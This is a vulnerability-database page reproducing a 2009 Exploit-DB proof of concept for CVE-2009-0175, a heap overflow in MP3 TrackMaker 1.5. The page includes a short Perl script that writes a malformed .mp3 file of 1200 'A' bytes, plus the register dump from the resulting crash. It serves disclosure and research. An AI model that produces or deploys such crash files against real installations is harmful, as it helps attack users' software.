Lucene search
+L

MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)

🗓️ 09 Jan 2009 00:00:00Reported by HoussamixType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

MP3 TrackMaker 1.5 local heap overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2009-0175
20 Jan 200916:00
attackerkb
circl
Circl
CVE-2009-0175
9 Jan 200900:00
circl
cve
CVE
CVE-2009-0175
20 Jan 200915:26
cve
cvelist
Cvelist
CVE-2009-0175
20 Jan 200915:26
cvelist
euvd
EUVD
EUVD-2009-0184
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0175
20 Jan 200916:00
nvd
prion
Prion
Heap overflow
20 Jan 200916:00
prion
# #!/bin/perl

# Author : HouSSamix

# MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC
# http://www.heathcosoft.com/software/mp3trackmaker/mp3tm15.exe

# open the program > browse (source file) > file exploit

#EAX 41414141  <<<
#ECX 000000F8
#EDX 0000020A
#EBX 00000000
#ESP 0012F408
#EBP 0012F470
#ESI 00000000
#EDI 00000158
#EIP 7C91EB94 ntdll.KiFastSystemCallRet

print "===================================================================== \n";
print "Author : Houssamix  \n";
print "===================================================================== \n";
print "MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC						 \n";
print "===================================================================== \n\n";

my $file="hsmx.mp3";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE  "A" x 1200;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jan 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05554
35